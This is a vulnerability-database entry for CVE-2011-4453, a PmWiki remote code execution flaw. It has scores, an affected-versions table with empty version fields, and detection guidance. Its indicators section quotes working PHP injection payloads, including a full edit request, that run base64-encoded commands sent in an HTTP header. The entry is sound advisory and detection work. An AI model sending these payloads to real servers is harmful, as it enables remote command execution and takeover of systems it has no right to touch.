cbcvebase.
CVE-2011-4453
published 2011-12-22

CVE-2011-4453: The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted…

PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
53.41%
98.9th percentile
The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive, leading to unintended use of the PHP create_function function.

Affected

76 ranges· showing 25
VendorProductVersion rangeFixed in
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki
pmwikipmwiki

Detection & IOCsextracted from sources · hover to see the quote

path/scripts/pagelist.php
path/pmwiki.php
commandaction=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#:)
command']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#
command(:pagelist order=']);error_reporting(0);eval(base64_decode($_SERVER[HTTP_#{header}]));die;#:)
urlpmwiki.php?n=PmWiki.Version
  • Detect POST requests to pmwiki.php containing a 'pagelist order=' directive with PHP injection sequences (e.g., ']);, error_reporting, passthru, eval, base64_decode) in the 'text' or 'order' parameter.
  • Alert on HTTP requests to pmwiki.php with a custom HTTP header (e.g., 'Cmd:') carrying base64-encoded OS commands, used to pass commands to the injected passthru/eval payload via $_SERVER[HTTP_CMD].
  • Flag POST requests to pmwiki.php with action=edit&post=save and a 'text' body containing '(:pagelist order=' followed by PHP code sequences such as ']);error_reporting(0);.
  • Monitor for the version fingerprint request to pmwiki.php?n=PmWiki.Version, which is used by the Metasploit module to check if the target is running a vulnerable version (pmwiki-2.0.0 to 2.2.34).
  • ·Exploitation may require authentication if the wiki is not configured for public write access; unauthenticated exploitation is only possible on publicly writable PmWiki instances.
  • ·The vulnerability affects PmWiki versions 2.0.0 through 2.2.34; version 2.2.35 and later are patched.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.